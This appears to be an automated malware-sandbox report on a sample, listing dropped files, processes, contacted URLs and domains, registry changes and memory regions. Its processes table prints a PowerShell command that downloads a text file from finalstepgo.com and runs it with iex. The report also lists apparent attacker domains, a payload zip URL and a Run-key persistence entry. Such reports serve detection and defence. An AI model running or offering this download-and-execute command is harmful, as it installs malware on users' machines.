Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PrivacyDrive.exe_399bced0f19559916f29b8661c38217a355522d5_7d659330_88be3ff3-0823-458e-b933-1ef07a852004\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
 |
|
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PrivacyDrive.exe_399bced0f19559916f29b8661c38217a355522d5_7d659330_fca01ca3-85f0-4bce-8d1a-34dc9a94153d\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PrivacyDrive.exe_8656b2f314abb98882e678a2dbf4aab982b7182_7d659330_dd4513b3-028e-469c-93b1-188613156302\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PrivacyDrive.exe_fef1a7949e4fa8cb69f4d5963b96612fcca58a7_7d659330_f744aa91-56af-4ef1-8f82-7361129391f5\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0x0dfd3e4c, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6C51.tmp.dmp
|
Mini DuMP crash report, 15 streams, Thu Sep 26 15:46:49 2024, 0x1205a4 type
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6F7E.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6FAE.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER725C.tmp.dmp
|
Mini DuMP crash report, 15 streams, Thu Sep 26 15:46:50 2024, 0x1205a4 type
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7357.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7377.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7634.tmp.dmp
|
Mini DuMP crash report, 15 streams, Thu Sep 26 15:46:51 2024, 0x1205a4 type
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER772F.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER774F.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9545.tmp.dmp
|
Mini DuMP crash report, 15 streams, Thu Sep 26 15:46:59 2024, 0x1205a4 type
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9602.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9632.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3h4c44qq.aqz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5jngmtqb.epp.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_anvhf53m.wns.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dqbu2tt4.x4g.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fk2vrmc2.l3j.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ni4nz3ke.o2y.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\BIT2853.tmp
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\yANrdNKT.zip (copy)
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
|
C:\Windows\appcompat\Programs\Amcache.hve
|
MS Windows registry file, NT/2000 or above
|
dropped
|
There are 21 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\SysWOW64\cmd.exe
|
cmd /C ""PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url
-UseBasicParsing; $text = $response.Content; iex $text"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing;
$text = $response.Content; iex $text
|
|
|
|
C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe
|
"C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe"
|
|
|
|
C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe
|
"C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
|
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1760
|
||
|
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1740
|
||
|
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1696
|
||
|
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1716
|
||
|
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 764 -s 1728
|
There are 1 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://racedsuitreow.shop/P
|
unknown
|
|
|
|
covvercilverow.shop
|
|
||
|
https://finalstepgo.com/
|
unknown
|
|
|
|
pumpkinkwquo.shop
|
|
||
|
abortinoiwiam.shop
|
|
||
|
deallyharvenw.shop
|
|
||
|
defenddsouneuw.shop
|
|
||
|
priooozekw.shop
|
|
||
|
https://racedsuitreow.shop/api
|
172.67.206.221
|
|
|
|
surroundeocw.shop
|
|
||
|
racedsuitreow.shop
|
|
||
|
candleduseiwo.shop
|
|
||
|
https://finalstepgo.com/uploads/il2.txt
|
185.255.122.133
|
|
|
|
https://www.cloudflare.com/learning/access-management/phishing-attack/
|
unknown
|
||
|
https://racedsuitreow.shop/apiU.h
|
unknown
|
||
|
http://ocsp.thawte.com0
|
unknown
|
||
|
https://finalstepgo.com/uploads/il222.zip
|
185.255.122.133
|
||
|
http://crl.ver)
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2.C:
|
unknown
|
||
|
https://racedsuitreow.shop/apiJV&
|
unknown
|
||
|
http://upx.sf.net
|
unknown
|
||
|
http://www.privacy-drive.comx
|
unknown
|
||
|
https://www.thawte.com/cps0
|
unknown
|
||
|
https://finalstepgo.com/uploads/il222.zipK
|
unknown
|
||
|
https://finalstepgo.com:443/uploads/il222.zip
|
unknown
|
||
|
https://www.cloudflare.com/learning/access-ma
|
unknown
|
||
|
https://www.cloudflare.com/5xx-error-landing
|
unknown
|
||
|
https://racedsuitreow.shop/apiV
|
unknown
|
||
|
https://g.live.com/odclientsettings/Prod.C:
|
unknown
|
||
|
https://racedsuitreow.shop/
|
unknown
|
||
|
https://racedsuitreow.shop/)e3
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2
|
unknown
|
||
|
https://finalstepgo.com/a
|
unknown
|
||
|
https://racedsuitreow.shop/apisP
|
unknown
|
||
|
http://crl.thawte.com/ThawteTimestampingCA.crl0
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
|
unknown
|
||
|
https://racedsuitreow.shop/3
|
unknown
|
||
|
https://www.thawte.com/cps0/
|
unknown
|
||
|
https://www.thawte.com/repository0W
|
unknown
|
||
|
https://racedsuitreow.shop:443/api
|
unknown
|
||
|
https://racedsuitreow.shop/apie
|
unknown
|
||
|
https://www.cybertronsoft.com
|
unknown
|
||
|
https://finalstepgo.com:443/uploads/il222.zipe
|
unknown
|
||
|
http://crl.thawte.com/ThawtePremiumServerCA.crl0
|
unknown
|
||
|
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
|
unknown
|
There are 35 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
racedsuitreow.shop
|
172.67.206.221
|
|
|
|
finalstepgo.com
|
185.255.122.133
|
|
|
|
candleduseiwo.shop
|
unknown
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
185.255.122.133
|
finalstepgo.com
|
Netherlands
|
|
|
|
172.67.206.221
|
racedsuitreow.shop
|
United States
|
|
|
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
RATU0Beb
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
||
|
\REGISTRY\A\{3c49cb5a-7e60-7928-00c0-a32aaafcea03}\Root\InventoryApplicationFile\privacydrive.exe|402211eebf1f5b0c
|
ProgramId
|
||
|
\REGISTRY\A\{3c49cb5a-7e60-7928-00c0-a32aaafcea03}\Root\InventoryApplicationFile\privacydrive.exe|402211eebf1f5b0c
|
FileId
|
||
|
\REGISTRY\A\{3c49cb5a-7e60-7928-00c0-a32aaafcea03}\Root\InventoryApplicationFile\privacydrive.exe|402211eebf1f5b0c
|
LowerCaseLongPath
|
||
|
\REGISTRY\A\{3c49cb5a-7e60-7928-00c0-a32aaafcea03}\Root\InventoryApplicationFile\privacydrive.exe|402211eebf1f5b0c
|
LongPathHash
|
||
|
\REGISTRY\A\{3c49cb5a-7e60-7928-00c0-a32aaafcea03}\Root\InventoryApplicationFile\privacydrive.exe|402211eebf1f5b0c
|
Name
|
||
|
\REGISTRY\A\{3c49cb5a-7e60-7928-00c0-a32aaafcea03}\Root\InventoryApplicationFile\privacydrive.exe|402211eebf1f5b0c
|
OriginalFileName
|
||
|
\REGISTRY\A\{3c49cb5a-7e60-7928-00c0-a32aaafcea03}\Root\InventoryApplicationFile\privacydrive.exe|402211eebf1f5b0c
|
Publisher
|
||
|
\REGISTRY\A\{3c49cb5a-7e60-7928-00c0-a32aaafcea03}\Root\InventoryApplicationFile\privacydrive.exe|402211eebf1f5b0c
|
Version
|
||
|
\REGISTRY\A\{3c49cb5a-7e60-7928-00c0-a32aaafcea03}\Root\InventoryApplicationFile\privacydrive.exe|402211eebf1f5b0c
|
BinFileVersion
|
||
|
\REGISTRY\A\{3c49cb5a-7e60-7928-00c0-a32aaafcea03}\Root\InventoryApplicationFile\privacydrive.exe|402211eebf1f5b0c
|
BinaryType
|
||
|
\REGISTRY\A\{3c49cb5a-7e60-7928-00c0-a32aaafcea03}\Root\InventoryApplicationFile\privacydrive.exe|402211eebf1f5b0c
|
ProductName
|
||
|
\REGISTRY\A\{3c49cb5a-7e60-7928-00c0-a32aaafcea03}\Root\InventoryApplicationFile\privacydrive.exe|402211eebf1f5b0c
|
ProductVersion
|
||
|
\REGISTRY\A\{3c49cb5a-7e60-7928-00c0-a32aaafcea03}\Root\InventoryApplicationFile\privacydrive.exe|402211eebf1f5b0c
|
LinkDate
|
||
|
\REGISTRY\A\{3c49cb5a-7e60-7928-00c0-a32aaafcea03}\Root\InventoryApplicationFile\privacydrive.exe|402211eebf1f5b0c
|
BinProductVersion
|
||
|
\REGISTRY\A\{3c49cb5a-7e60-7928-00c0-a32aaafcea03}\Root\InventoryApplicationFile\privacydrive.exe|402211eebf1f5b0c
|
AppxPackageFullName
|
||
|
\REGISTRY\A\{3c49cb5a-7e60-7928-00c0-a32aaafcea03}\Root\InventoryApplicationFile\privacydrive.exe|402211eebf1f5b0c
|
AppxPackageRelativeId
|
||
|
\REGISTRY\A\{3c49cb5a-7e60-7928-00c0-a32aaafcea03}\Root\InventoryApplicationFile\privacydrive.exe|402211eebf1f5b0c
|
Size
|
||
|
\REGISTRY\A\{3c49cb5a-7e60-7928-00c0-a32aaafcea03}\Root\InventoryApplicationFile\privacydrive.exe|402211eebf1f5b0c
|
Language
|
||
|
\REGISTRY\A\{3c49cb5a-7e60-7928-00c0-a32aaafcea03}\Root\InventoryApplicationFile\privacydrive.exe|402211eebf1f5b0c
|
Usn
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData
|
ClockTimeSeconds
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData
|
TickCount
|
There are 28 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
F70000
|
direct allocation
|
page execute and read and write
|
|
|
|
42A0000
|
remote allocation
|
page read and write
|
||
|
24B039E0000
|
trusted library section
|
page read and write
|
||
|
24B08F50000
|
trusted library allocation
|
page read and write
|
||
|
6EFE000
|
stack
|
page read and write
|
||
|
1729000
|
heap
|
page read and write
|
||
|
1E4000
|
heap
|
page read and write
|
||
|
4330000
|
heap
|
page read and write
|
||
|
10C4000
|
heap
|
page read and write
|
||
|
24B090DC000
|
heap
|
page read and write
|
||
|
1E4000
|
heap
|
page read and write
|
||
|
15B9000
|
heap
|
page read and write
|
||
|
24B09220000
|
trusted library allocation
|
page read and write
|
||
|
15C7000
|
heap
|
page read and write
|
||
|
24B04313000
|
heap
|
page read and write
|
||
|
24B090DE000
|
heap
|
page read and write
|
||
|
BDE1F7E000
|
stack
|
page read and write
|
||
|
24B03970000
|
heap
|
page read and write
|
||
|
1A30000
|
heap
|
page read and write
|
||
|
11F5000
|
heap
|
page read and write
|
||
|
24B04501000
|
trusted library allocation
|
page read and write
|
||
|
24B09290000
|
trusted library allocation
|
page read and write
|
||
|
5AC000
|
unkown
|
page write copy
|
||
|
1932000
|
heap
|
page read and write
|
||
|
493F000
|
stack
|
page read and write
|
||
|
1E4000
|
heap
|
page read and write
|
||
|
3FD1000
|
heap
|
page read and write
|
||
|
5AD000
|
unkown
|
page write copy
|
||
|
24B09200000
|
trusted library allocation
|
page read and write
|
||
|
5AD000
|
unkown
|
page write copy
|
||
|
10C0000
|
heap
|
page read and write
|
||
|
BDE1B7E000
|
stack
|
page read and write
|
||
|
24B092FC000
|
trusted library allocation
|
page read and write
|
||
|
24B03990000
|
heap
|
page read and write
|
||
|
24B0431A000
|
heap
|
page read and write
|
||
|
24B09100000
|
heap
|
page read and write
|
||
|
10C4000
|
heap
|
page read and write
|
||
|
15D0000
|
heap
|
page read and write
|
||
|
24B0905B000
|
heap
|
page read and write
|
||
|
5BA000
|
unkown
|
page read and write
|
||
|
1E0000
|
heap
|
page read and write
|
||
|
BDE197E000
|
stack
|
page read and write
|
||
|
5548000
|
trusted library allocation
|
page read and write
|
||
|
24B04B40000
|
trusted library section
|
page readonly
|
||
|
1240000
|
heap
|
page read and write
|
||
|
24B04840000
|
trusted library allocation
|
page read and write
|
||
|
4370000
|
heap
|
page read and write
|
||
|
11B1000
|
heap
|
page read and write
|
||
|
24B03A13000
|
heap
|
page read and write
|
||
|
15B9000
|
heap
|
page read and write
|
||
|
10D1000
|
heap
|
page read and write
|
||
|
BDE25FE000
|
unkown
|
page readonly
|
||
|
24B03A79000
|
heap
|
page read and write
|
||
|
15C7000
|
heap
|
page read and write
|
||
|
1497000
|
heap
|
page read and write
|
||
|
1A38000
|
heap
|
page read and write
|
||
|
15C7000
|
heap
|
page read and write
|
||
|
24B092A3000
|
trusted library allocation
|
page read and write
|
||
|
15C7000
|
heap
|
page read and write
|
||
|
666E000
|
stack
|
page read and write
|
||
|
5ABD000
|
stack
|
page read and write
|
||
|
BDE17FB000
|
stack
|
page read and write
|
||
|
10C4000
|
heap
|
page read and write
|
||
|
11D5000
|
heap
|
page read and write
|
||
|
1610000
|
heap
|
page read and write
|
||
|
BDE1AFE000
|
unkown
|
page readonly
|
||
|
10C4000
|
heap
|
page read and write
|
||
|
24B0435B000
|
heap
|
page read and write
|
||
|
24B094F0000
|
trusted library allocation
|
page read and write
|
||
|
11D1000
|
unclassified section
|
page execute read
|
||
|
24B092C0000
|
trusted library allocation
|
page read and write
|
||
|
15FC000
|
heap
|
page read and write
|
||
|
24B03A96000
|
heap
|
page read and write
|
||
|
1810000
|
heap
|
page read and write
|
||
|
5CB000
|
unkown
|
page readonly
|
||
|
400000
|
unkown
|
page readonly
|
||
|
5B7D000
|
stack
|
page read and write
|
||
|
11B8000
|
heap
|
page read and write
|
||
|
15B9000
|
heap
|
page read and write
|
||
|
1F0000
|
heap
|
page read and write
|
||
|
24B092F0000
|
remote allocation
|
page read and write
|
||
|
24B08F30000
|
trusted library allocation
|
page read and write
|
||
|
1610000
|
heap
|
page read and write
|
||
|
121C000
|
unclassified section
|
page readonly
|
||
|
10D1000
|
heap
|
page read and write
|
||
|
1497000
|
heap
|
page read and write
|
||
|
104C000
|
stack
|
page read and write
|
||
|
BDE1FFE000
|
unkown
|
page readonly
|
||
|
24B04300000
|
heap
|
page read and write
|
||
|
121A000
|
heap
|
page read and write
|
||
|
10C4000
|
heap
|
page read and write
|
||
|
1610000
|
heap
|
page read and write
|
||
|
24B08F90000
|
trusted library allocation
|
page read and write
|
||
|
24B09264000
|
trusted library allocation
|
page read and write
|
||
|
24B09047000
|
heap
|
page read and write
|
||
|
1693000
|
heap
|
page read and write
|
||
|
BDE13FC000
|
stack
|
page read and write
|
||
|
4340000
|
heap
|
page read and write
|
||
|
24B03A8D000
|
heap
|
page read and write
|
||
|
5C1000
|
unkown
|
page readonly
|
||
|
11B9000
|
heap
|
page read and write
|
||
|
15EF000
|
heap
|
page read and write
|
||
|
1638000
|
heap
|
page read and write
|
||
|
11BD000
|
heap
|
page read and write
|
||
|
24B04215000
|
heap
|
page read and write
|
||
|
10C4000
|
heap
|
page read and write
|
||
|
BDE11FE000
|
stack
|
page read and write
|
||
|
BDE227E000
|
stack
|
page read and write
|
||
|
10C4000
|
heap
|
page read and write
|
||
|
156B000
|
heap
|
page read and write
|
||
|
773E000
|
stack
|
page read and write
|
||
|
17B5000
|
heap
|
page read and write
|
||
|
5486000
|
trusted library allocation
|
page read and write
|
||
|
24B09103000
|
heap
|
page read and write
|
||
|
24B08F60000
|
trusted library allocation
|
page read and write
|
||
|
552000
|
unkown
|
page readonly
|
||
|
172C000
|
heap
|
page read and write
|
||
|
5C1000
|
unkown
|
page readonly
|
||
|
771E000
|
stack
|
page read and write
|
||
|
24B092F0000
|
remote allocation
|
page read and write
|
||
|
5C1000
|
unkown
|
page readonly
|
||
|
6E6F000
|
stack
|
page read and write
|
||
|
11D4000
|
heap
|
page read and write
|
||
|
24B03ABA000
|
heap
|
page read and write
|
||
|
15CD000
|
heap
|
page read and write
|
||
|
15D0000
|
heap
|
page read and write
|
||
|
24B09218000
|
trusted library allocation
|
page read and write
|
||
|
ECD000
|
stack
|
page read and write
|
||
|
BDE15FB000
|
stack
|
page read and write
|
||
|
10C4000
|
heap
|
page read and write
|
||
|
119D000
|
heap
|
page read and write
|
||
|
24B092F1000
|
trusted library allocation
|
page read and write
|
||
|
24B04B10000
|
trusted library section
|
page readonly
|
||
|
41F0000
|
heap
|
page read and write
|
||
|
10D1000
|
heap
|
page read and write
|
||
|
24B0901E000
|
heap
|
page read and write
|
||
|
24B09220000
|
trusted library allocation
|
page read and write
|
||
|
1224000
|
unclassified section
|
page read and write
|
||
|
24B04B00000
|
trusted library section
|
page readonly
|
||
|
1551000
|
heap
|
page read and write
|
||
|
1932000
|
heap
|
page read and write
|
||
|
11F5000
|
heap
|
page read and write
|
||
|
11DF000
|
heap
|
page read and write
|
||
|
15F1000
|
heap
|
page read and write
|
||
|
513B000
|
stack
|
page read and write
|
||
|
3FD1000
|
heap
|
page read and write
|
||
|
24B03B28000
|
heap
|
page read and write
|
||
|
24B08F50000
|
trusted library allocation
|
page read and write
|
||
|
24B04B20000
|
trusted library section
|
page readonly
|
||
|
15C7000
|
heap
|
page read and write
|
||
|
7F3F000
|
stack
|
page read and write
|
||
|
10D1000
|
heap
|
page read and write
|
||
|
5CB000
|
unkown
|
page readonly
|
||
|
24B04302000
|
heap
|
page read and write
|
||
|
428D000
|
stack
|
page read and write
|
||
|
3FD1000
|
heap
|
page read and write
|
||
|
1E4000
|
heap
|
page read and write
|
||
|
5AC000
|
unkown
|
page read and write
|
||
|
BDE18FE000
|
unkown
|
page readonly
|
||
|
601000
|
unkown
|
page readonly
|
||
|
BDE1A7E000
|
stack
|
page read and write
|
||
|
BDE1BFE000
|
unkown
|
page readonly
|
||
|
11DF000
|
heap
|
page read and write
|
||
|
5140000
|
direct allocation
|
page read and write
|
||
|
76AE000
|
stack
|
page read and write
|
||
|
100000
|
heap
|
page read and write
|
||
|
24B0928E000
|
trusted library allocation
|
page read and write
|
||
|
24B04EC0000
|
trusted library allocation
|
page read and write
|
||
|
1A30000
|
heap
|
page read and write
|
||
|
BDE1EFE000
|
unkown
|
page readonly
|
||
|
3FD1000
|
heap
|
page read and write
|
||
|
3FD1000
|
heap
|
page read and write
|
||
|
76FF000
|
stack
|
page read and write
|
||
|
15C7000
|
heap
|
page read and write
|
||
|
11B3000
|
heap
|
page read and write
|
||
|
805F000
|
stack
|
page read and write
|
||
|
24B0435A000
|
heap
|
page read and write
|
||
|
1725000
|
heap
|
page read and write
|
||
|
122F000
|
unclassified section
|
page readonly
|
||
|
601000
|
unkown
|
page readonly
|
||
|
24B090E0000
|
heap
|
page read and write
|
||
|
24B08F80000
|
trusted library allocation
|
page read and write
|
||
|
15EF000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
1050000
|
direct allocation
|
page read and write
|
||
|
24B03A7D000
|
heap
|
page read and write
|
||
|
1726000
|
heap
|
page read and write
|
||
|
15C7000
|
heap
|
page read and write
|
||
|
BDE16FE000
|
unkown
|
page readonly
|
||
|
1727000
|
heap
|
page read and write
|
||
|
1736000
|
heap
|
page read and write
|
||
|
15FC000
|
heap
|
page read and write
|
||
|
6EBD000
|
stack
|
page read and write
|
||
|
24B03A8F000
|
heap
|
page read and write
|
||
|
1638000
|
heap
|
page read and write
|
||
|
24B0926C000
|
trusted library allocation
|
page read and write
|
||
|
24B03A5B000
|
heap
|
page read and write
|
||
|
9C000
|
stack
|
page read and write
|
||
|
15C3000
|
heap
|
page read and write
|
||
|
15FC000
|
heap
|
page read and write
|
||
|
121F000
|
unclassified section
|
page write copy
|
||
|
1020000
|
heap
|
page read and write
|
||
|
9C000
|
stack
|
page read and write
|
||
|
BDE1C7E000
|
stack
|
page read and write
|
||
|
537B000
|
stack
|
page read and write
|
||
|
10D1000
|
heap
|
page read and write
|
||
|
62C0000
|
remote allocation
|
page read and write
|
||
|
24B09280000
|
trusted library allocation
|
page read and write
|
||
|
F4E000
|
stack
|
page read and write
|
||
|
BDE20FA000
|
stack
|
page read and write
|
||
|
10C4000
|
heap
|
page read and write
|
||
|
637E000
|
stack
|
page read and write
|
||
|
1610000
|
heap
|
page read and write
|
||
|
1638000
|
heap
|
page read and write
|
||
|
4110000
|
heap
|
page read and write
|
||
|
52B0000
|
heap
|
page read and write
|
||
|
24B09291000
|
trusted library allocation
|
page read and write
|
||
|
24B08F40000
|
trusted library allocation
|
page read and write
|
||
|
BDE2F7E000
|
stack
|
page read and write
|
||
|
119D000
|
heap
|
page read and write
|
||
|
15B9000
|
heap
|
page read and write
|
||
|
10C4000
|
heap
|
page read and write
|
||
|
3FD0000
|
heap
|
page read and write
|
||
|
10C4000
|
heap
|
page read and write
|
||
|
1555000
|
heap
|
page read and write
|
||
|
557F000
|
trusted library allocation
|
page read and write
|
||
|
24B03AA1000
|
heap
|
page read and write
|
||
|
10D1000
|
heap
|
page read and write
|
||
|
24B092E5000
|
trusted library allocation
|
page read and write
|
||
|
15B9000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
11D4000
|
heap
|
page read and write
|
||
|
2A4F000
|
stack
|
page read and write
|
||
|
172C000
|
heap
|
page read and write
|
||
|
7F70000
|
trusted library allocation
|
page read and write
|
||
|
24B092A0000
|
trusted library allocation
|
page read and write
|
||
|
282F000
|
stack
|
page read and write
|
||
|
101E000
|
stack
|
page read and write
|
||
|
15EF000
|
heap
|
page read and write
|
||
|
24B03A74000
|
heap
|
page read and write
|
||
|
24B08F94000
|
trusted library allocation
|
page read and write
|
||
|
BDE0EF7000
|
stack
|
page read and write
|
||
|
5C0000
|
unkown
|
page read and write
|
||
|
1638000
|
heap
|
page read and write
|
||
|
1219000
|
heap
|
page read and write
|
||
|
1E4000
|
heap
|
page read and write
|
||
|
552000
|
unkown
|
page readonly
|
||
|
24B09052000
|
heap
|
page read and write
|
||
|
524E000
|
stack
|
page read and write
|
||
|
FE0000
|
trusted library allocation
|
page read and write
|
||
|
4B7F000
|
stack
|
page read and write
|
||
|
24B03B00000
|
heap
|
page read and write
|
||
|
24B09256000
|
trusted library allocation
|
page read and write
|
||
|
15CD000
|
heap
|
page read and write
|
||
|
5C0000
|
unkown
|
page read and write
|
||
|
1638000
|
heap
|
page read and write
|
||
|
24B03B13000
|
heap
|
page read and write
|
||
|
10C4000
|
heap
|
page read and write
|
||
|
1725000
|
heap
|
page read and write
|
||
|
24B092BA000
|
trusted library allocation
|
page read and write
|
||
|
10E1000
|
heap
|
page read and write
|
||
|
5CB000
|
unkown
|
page readonly
|
||
|
24B0926F000
|
trusted library allocation
|
page read and write
|
||
|
24B0431A000
|
heap
|
page read and write
|
||
|
172C000
|
heap
|
page read and write
|
||
|
1E4000
|
heap
|
page read and write
|
||
|
24B039A0000
|
heap
|
page read and write
|
||
|
24B092A0000
|
trusted library allocation
|
page read and write
|
||
